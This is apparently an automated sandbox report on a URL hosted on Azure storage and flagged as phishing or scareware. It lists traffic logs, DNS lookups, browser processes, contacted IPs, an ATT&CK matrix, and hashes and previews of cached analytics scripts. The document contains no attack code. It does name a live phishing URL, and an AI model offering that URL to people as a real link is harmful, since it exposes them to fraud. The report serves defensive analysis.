Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: NW9g0+gqMiM1PThushcQjA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: +kYdFGqfF/3OgXrvXIv7YA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: x0MLjAAappTWUUNXZvlgrw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: fFodMvXldkbPEyIlh3Q2hg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: tools.luckyorange.com
Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
Source: global trafficDNS traffic detected: DNS query: userstatics.com
Source: global trafficDNS traffic detected: DNS query: settings.luckyorange.com
Source: global trafficDNS traffic detected: DNS query: o.clarity.ms
Source: global trafficDNS traffic detected: DNS query: in.visitors.live
Source: global trafficDNS traffic detected: DNS query: realtime.luckyorange.com
Source: global trafficDNS traffic detected: DNS query: api-preview.luckyorange.com
Source: chromecache_89.2.drString found in binary or memory: http://fontawesome.io
Source: chromecache_89.2.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_102.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js
Source: chromecache_111.2.drString found in binary or memory: https://ezgif.com/optimize
Source: chromecache_80.2.dr, chromecache_90.2.dr, chromecache_101.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_100.2.dr, chromecache_110.2.drString found in binary or memory: https://github.com/microsoft/clarity
Source: chromecache_80.2.dr, chromecache_90.2.dr, chromecache_101.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_80.2.dr, chromecache_101.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_102.2.drString found in binary or memory: https://tools.luckyorange.com/core/lo.js?site-id=f6f3e602
Source: chromecache_102.2.drString found in binary or memory: https://www.clarity.ms/tag/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@18/83@28/10
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4084 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4084 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE0%Avira URL Cloudsafe
https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE100%SlashNextScareware type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
userstatics.com
172.67.208.186
truefalse
    high
    realtime.luckyorange.com
    35.244.167.102
    truefalse
      high
      www.google.com
      142.250.181.68
      truefalse
        high
        s-part-0035.t-0009.t-msedge.net
        13.107.246.63
        truefalse
          high
          in.visitors.live
          35.201.124.9
          truefalse
            high
            settings.luckyorange.com
            34.107.203.234
            truefalse
              high
              api-preview.luckyorange.com
              34.107.203.234
              truefalse
                high
                d20519brkbo4nz.cloudfront.net
                108.158.75.10
                truefalse
                  unknown
                  tools.luckyorange.com
                  unknown
                  unknownfalse
                    high
                    www.clarity.ms
                    unknown
                    unknownfalse
                      high
                      o.clarity.ms
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://tools.luckyorange.com/core/core.js?v=49d958cfalse
                          high
                          https://api-preview.luckyorange.com/public-authfalse
                            high
                            https://www.clarity.ms/s/0.7.56/clarity.jsfalse
                              high
                              https://in.visitors.live/socket.io/?EIO=3&transport=websocketfalse
                                high
                                https://www.clarity.ms/tag/nb9vpk5smtfalse
                                  high
                                  https://realtime.luckyorange.com/mqttfalse
                                    high
                                    https://tools.luckyorange.com/core/lo.js?site-id=f6f3e602false
                                      high
                                      https://settings.luckyorange.com/f6f3e602false
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://fontawesome.iochromecache_89.2.drfalse
                                          high
                                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_80.2.dr, chromecache_101.2.drfalse
                                            high
                                            https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_80.2.dr, chromecache_90.2.dr, chromecache_101.2.drfalse
                                              high
                                              https://getbootstrap.com/)chromecache_80.2.dr, chromecache_90.2.dr, chromecache_101.2.drfalse
                                                high
                                                https://www.clarity.ms/tag/chromecache_102.2.drfalse
                                                  high
                                                  https://ezgif.com/optimizechromecache_111.2.drfalse
                                                    high
                                                    https://github.com/microsoft/claritychromecache_100.2.dr, chromecache_110.2.drfalse
                                                      high
                                                      http://fontawesome.io/licensechromecache_89.2.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        13.107.246.63
                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        34.107.203.234
                                                        settings.luckyorange.comUnited States
                                                        15169GOOGLEUSfalse
                                                        172.67.208.186
                                                        userstatics.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        35.201.124.9
                                                        in.visitors.liveUnited States
                                                        15169GOOGLEUSfalse
                                                        35.244.167.102
                                                        realtime.luckyorange.comUnited States
                                                        15169GOOGLEUSfalse
                                                        108.158.75.10
                                                        d20519brkbo4nz.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        142.250.181.68
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        104.21.53.38
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        IP
                                                        192.168.2.4
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1564528
                                                        Start date and time:2024-11-28 13:33:33 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 2m 58s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:10
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal56.phis.win@18/83@28/10
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 64.233.165.84, 34.104.35.123, 20.150.125.164, 172.217.19.234, 199.232.210.172, 192.229.221.95, 172.217.17.42, 216.58.208.234, 172.217.19.202, 142.250.181.10, 172.217.21.42, 142.250.181.138, 142.250.181.106, 172.217.17.74, 52.152.143.207, 142.250.181.42, 172.217.19.170, 172.217.17.35
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):67359
                                                        Entropy (8bit):5.352035171848617
                                                        Encrypted:false
                                                        SSDEEP:768:oDR8aeY7IeuemSlrl6JoUXXRuoBMALCYdPRJ2Op/Xnum7xX/FA1pFwmv6SKbyGl6:oDR+cASlrlerNjxp/Xnum7zlEb
                                                        MD5:0018B2947487CCA1596BA00A9D80130C
                                                        SHA1:F701C05D59788094B38DC8FCBBBB24219F903845
                                                        SHA-256:DC1DA692990307185621FD661B7305E29D3A0A5BA0F0D998E5A1463A17C57044
                                                        SHA-512:4411B4512287790F763F84B4C5FAE7FBF08AC6FEA39111964FA5AABB31EC7EE5051F3AF434103379A37148A65E1B354F0967AA27FD5844C4D5C7DFD416E49AA4
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/* clarity-js v0.7.56: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return dr},get start(){return lr},get stop(){return fr},get track(){return ir}}),e=Object.freeze({__proto__:null,get clone(){return Ar},get compute(){return jr},get data(){return Tr},get keys(){return Nr},get reset(){return Rr},get start(){return Cr},get stop(){return zr},get trigger(){return Dr},get update(){return Lr}}),n=Object.freeze({__proto__:null,get check(){return qr},get compute(){return Fr},get data(){return Or},get start(){return Yr},get stop(){return Vr},get trigger(){return Ur}}),a=Object.freeze({__proto__:null,get compute(){return $r},get data(){return Br},get log(){return Qr},get reset(){return ti},get start(){return Kr},get stop(){return Zr},get updates(){return Jr}}),r=Object.freeze({__proto__:null,get callback(){return fi},get callbacks(){return ai},get clear(){return di},get consent(){return li},get data(){return ni},
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (59765)
                                                        Category:downloaded
                                                        Size (bytes):60044
                                                        Entropy (8bit):5.145139926823033
                                                        Encrypted:false
                                                        SSDEEP:768:wfAnnayQIk8HVheIE8Dg76TXQI4vPKMEK6viTlCDFm4n6xOp6Pxg3/wCVaAk2:wfUnTcWCw6xJxg7aAz
                                                        MD5:02D223393E00C273EFDCB1ADE8F4F8B1
                                                        SHA1:0CC93B8421D89C24A889642428B363CB831DE78A
                                                        SHA-256:79C599DD760CEC0C1621A1AF49D9A2A49DA5D45E1B37D4575BACE0A5E0226582
                                                        SHA-512:339296DF3B6E2080A65488634AA5DED35A15D9BA5EDB8F203B1AA695C62B13302FC2CECFC37CFA04AD2219BAF0BDDAD4414862DDE5E0B71A7923C3C3A3D61F8D
                                                        Malicious:false
